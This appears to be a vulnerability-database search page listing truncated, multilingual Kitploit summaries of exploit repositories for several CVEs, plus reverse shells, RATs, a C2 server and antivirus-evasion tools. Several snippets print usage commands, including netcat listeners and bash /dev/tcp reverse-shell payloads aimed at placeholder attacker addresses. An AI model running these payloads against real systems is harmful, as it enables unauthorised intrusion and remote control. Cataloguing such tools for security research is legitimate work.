Lucene search
+L

2521 matches found

Kitploit
Kitploit
added 2026/09/02 5:07 a.m.5 views

CVE-2020-15778-Exploit

CVE-2020-15778-Exploit Exploit para CVE-2020-15778 vuln. de OpenSSH Ejemplo: python CVE-2020-15778.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234 Debes usar netcat para escuchar en el puerto antes de usar el script de Python Ejemplo: nc -lvp 1234 1. Captura de pantalla del uso del script...

7.8CVSS6.7AI score0.12996EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/02 5:07 a.m.6 views

CVE-2022-46169

CVE-2022-46169 このリポジトリは、CVE-2022-46169のProof of Concept(PoC)を含んでいます - Cacti = 1.2.22における認証不要のRCE。詳細はこちらをご覧ください。このスクリプトはリバースシェルハンドラを追加し、sAsPeCt488によって書かれたコードに基づいています。元のコードはこちらでご覧いただけます。 使い方 root@kitploit: python3 CVE-2022-46169.py -t 10.129.211.250 -i 10.10.14.72 -p 4444 Arguments: -t : Target IP...

9.8CVSS7.4AI score0.99826EPSS
SaveExploits48References1
Kitploit
Kitploit
added 2026/09/02 5:00 a.m.3 views

cve-2023-38646-metabase-ReverseShell

cve-2023-38646-metabase-ReverseShell ejecutar comando go run .\CVE-2023-38646-metabase-ReverseShell.go -u http://target.com:targetPort -h Your VPS IPaddr -p NC listen Port nota cuando ingreses el host de destino, no olvides el http:// o https://...

9.8CVSS7.4AI score0.98677EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/02 4:55 a.m.6 views

CVE-2021-21425

CVE-2021-21425 出典: https://www.exploit-db.com/exploits/49973 1 ターゲットIPを変更 2 ペイロードを変更 echo -ne "bash -i & /dev/tcp/OUR-IP/80 0&1" | base64 -w0 3 sudo nc -lvnp 80 4 python3 exploit.py...

9.8CVSS7.2AI score0.806EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/02 4:43 a.m.6 views

RedbloodC2

Redblood C2 公開版 root@kitploit: This is a simple command and control server to handle sessions and your victims インストール root@kitploit: $ git clone https://github.com/kira2040k/RedbloodC2.git $ cd RedbloodC2 $ npm install $ node server.js 使用方法 root@kitploit: After install node.js and and all modules...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/02 4:42 a.m.6 views

CVE-2019-0193-exp

CVE-2019-0193-exp 1 root@kitploit: &/dev/tcp/127.0.0.1/9999 0&1"; var result = ; whiletrue var oneline = bufReader.readLine; result.push oneline ; if!oneline break; row.put"title",result.join"\n\r"; return row; 2.jdbc: root@kitploit: &/dev/tcp/127.0.0.1/9999 0&1"; entity name="a"...

9CVSS7.1AI score0.83547EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/02 4:29 a.m.6 views

PwnLnX

PwnLnX Linuxシステムをハッキングするための高度なマルチスレッド 、マルチクライアント Pythonリバースシェルです。まだやるべきことはたくさんあるので、気軽に開発に協力してください。 免責事項 : このリバースシェルは、許可されたシステムの合法的なリモート管理のみに使用されるべきです。許可なくコンピュータネットワークにアクセスすることは違法です。 📫 連絡はこちら! はじめに 以下の手順に従って、PwnLnXをローカルマシンで問題なく実行できるようにしてください。 前提条件 Python3: vidstream pyfiglet tqdm mss termcolor...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/02 4:25 a.m.5 views

AVBypass

アンチウイルス回避保護 必要条件 golang がインストールされていること 使用方法 root@kitploit: 1 - create your payload go run create.go e.g: go run create.go 1.1.1.1 443 SecRetkira https://www.youtube.com/watch?v=Rv4VzpGCEEM 2 - in output folder you will find shell.go compile it go build shell.go 3 - now you have exe file to execut...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/02 4:23 a.m.3 views

XeytanWin32-RAT

警告 这是一个存在缺陷的 RAT,尚未完成,也不稳定。它仍是一个“开发中”的应用程序。 简介 创建这个项目是为了消磨我的一些空闲时间,它并未被积极维护。 有很多地方需要改进/修复,这个项目要达到稳定状态还需要时间。 功能特性 反向 Shell 列出进程 桌面流式传输 文件系统 下载文件 理解项目 IThreadChannels 是让两个线程以同步方式进行通信的手段。 我将它们用作两个线程通信时共享的原子对象;在这个应用中, 我需要双向通信,因此需要两个通道,这就是我创建 IDoubleThreadChannel 的原因。 同步意味着必须由通信线程调用它们,才能按需接收事件。 例如,UI...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/02 4:18 a.m.4 views

RSPET

RSPET RSPET(Reverse Shell and Post Exploitation Tool)は、Python ベースのリバースシェルであり、ポストエクスプロイテーションシナリオを支援する機能を備えています。 免責事項:このソフトウェアは教育目的およびペネトレーションテスト目的、ならびに概念実証として提供されています。開発者は許可されていないコンピュータアクセスやネットワークの混乱を推奨、扇動、またはいかなる形でも支援するものではありません。 注記:min フォルダは削除されました。2つのバージョンを維持するオーバーヘッドが追加されたため、min...

5.9AI score
SaveExploits0References7
Kitploit
Kitploit
added 2026/09/02 4:14 a.m.3 views

metabase-pre-auth-rce-poc

Metabase Pre-Auth RCE CVE-2023-38646 POC This is a script written in Python that allows the exploitation of the Metabase's software security flaw described in CVE-2023-38646. The system is vulnerable in versions preceding 0.46.6.1 , in the open-source edition, and preceding 1.46.6.1 , in the...

9.8CVSS7.4AI score0.98677EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/02 4:13 a.m.4 views

SenselessViolence

SenselessViolence CVE-2022-31814 pfSense pfBlockerNG = 2.1.426 Kit de explotación. ¿Qué? Este es un kit de explotación para la inyección remota de comandos en los plugins pfSense pfBlockerNG = 2.1.426 descubierta por IHTeam. Escribí esto para jugar con algunos de los principios de diseño...

9.8CVSS7.2AI score0.87798EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/02 4:13 a.m.5 views

CVE-2022-22963-POC

CVE-2022-22963 漏洞利用 描述 在 Spring Cloud Function 3.1.6、3.2.2 及更早的不受支持版本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行并访问本地资源。更多详情请参见 CVE-2022-22963 详情。 基于 AayushmanThapaMagar 提供的 PoC,我正在创建一个简单的漏洞利用程序,从易受攻击的服务器获取反向 shell。 该项目的目的是简化漏洞测试并学习如何利用它。我稍后会添加关于此漏洞原因的更多细节。 需求 要运行此漏洞利用程序,你只需要 Docker。 使用方法...

9.8CVSS6.9AI score0.99938EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/02 4:09 a.m.4 views

fudshell

fudshell Red Teaming用のFUD持続的リバースシェルを生成する効率的なスクリプト。生成されたスタブをVirusTotalにアップロードしないでください。 警告: root@kitploit: ペイロードをVirusTotalにアップロードしないでください。もし検出された場合は、 お知らせください...スタブを更新します。 Cobalt Strikeの回避策が必要な場合は、Telegram: @R0ot1337 までDMしてください。 使用方法: root@kitploit: 1. LHOST(あなたのIP)を入力 2. LPORT(あなたのポート)を入力 3...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/02 4:01 a.m.6 views

siemframework

SIEMS FRAMEWORK MultiSIEM 模块化 Python3 攻击框架 ElevenPaths https://www.elevenpaths.com/ 用法: python3 ./siemsframework.py 简介 SIEM 是网络安全领域日益常用的防御性工具,尤其是大型企业和那些需要监控高度关键系统与网络的公司。然而,从攻击者的角度来看,SIEM 在企业网络中对系统和账户所拥有的权限是极高的。此外,对 SIEM 的管理员访问权限可能被用来在安装该 SIEM 的服务器上执行代码,有时也会影响客户端机器,因为 SIEM 会收集来自 Active Directory...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/02 4:00 a.m.34 views

mediator

Mediator is an end-to-end encrypted reverse shell in which the operator and the shell connect to a "mediator" server that bridges the connections. This removes the need for the operator/handler to set up port forwarding in order to listen for the connection. Mediator also allows you to create...

6AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/02 4:00 a.m.5 views

mediator

Mediatorは、オペレーターとシェルが接続をブリッジする「mediator」サーバーに接続する、エンドツーエンド暗号化されたリバースシェルです。これにより、オペレーター/ハンドラーが接続を待ち受けるためにポートフォワーディングを設定する必要がなくなります。Mediatorでは、リバースシェルの機能を拡張するプラグインを作成することもできます。 Mediatorのスクリプトはスタンドアロンの実行可能ファイルとして実行することも、他のペネトレーションテストやインシデントレスポンスツールに統合するためにインポートすることもできます。 アーキテクチャ:...

5.9AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/02 3:58 a.m.4 views

CVE-2022-22947

在王政代码基础上添加了,两种反弹shell,出网探测, 运行行时缺少什么模块。使用pip下载哪个模块就行了。 输入可疑的url地址,注意端口后面不要跟'/' 1.先检测是否存在漏洞 默认命令执行的是whoami,因为好多命令执行并不会回显,whoami若回显成功则存在漏洞 返回内容有root,确定存在漏洞 2.反弹shell 输入公网ip与端口 若反弹成功,此页面会卡住。 若反弹失败,会直接结束 3.测试出网, 是为了功能4准备的 默认访问百度页面 4.使用java代码反弹shell 若不能反弹shell,可能不支持/dev/tcp...

10CVSS7AI score0.98253EPSS
SaveExploits54
Kitploit
Kitploit
added 2026/09/02 3:57 a.m.6 views

CVE-2017-12617

CVE-2017-12617 CVE-2017-12617 是 Apache Tomcat 中一个严重的远程代码执行(RCE)漏洞。 该漏洞影响版本 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81。 仅在 8.0.24 上测试过。漏洞利用了应用程序或 Tomcat 实例本身配置不当的 PUT 选项。 它使用 PUT 将反向 shell 有效载荷发送到服务器并执行,同时用 netcat 监听。 由于互联网上存在许多相同漏洞的利用版本但基于 python2,我将其重写为与 Python 3 兼容。 祝玩得愉...

8.1CVSS7AI score0.99988EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/02 3:46 a.m.3 views

Log4Shell-CVE-2021-44228-ENV

Log4Shell复现环境 示例说明 被攻击机ip:47.47.47.47 攻击机ip:48.48.48.48 被攻击机运行漏洞Docker 使用DockerFile build docker镜像运行: root@kitploit: docker build . -t vuln docker run -p 8080:8080 --name vuln vuln 攻击机运行攻击Docker 使用DockerFile build docker镜像运行 root@kitploit: docker build . -t attack docker run -itd -p 9999:9999 -p...

10CVSS7AI score0.99999EPSS
SaveExploits367References3
Rows per page
Query Builder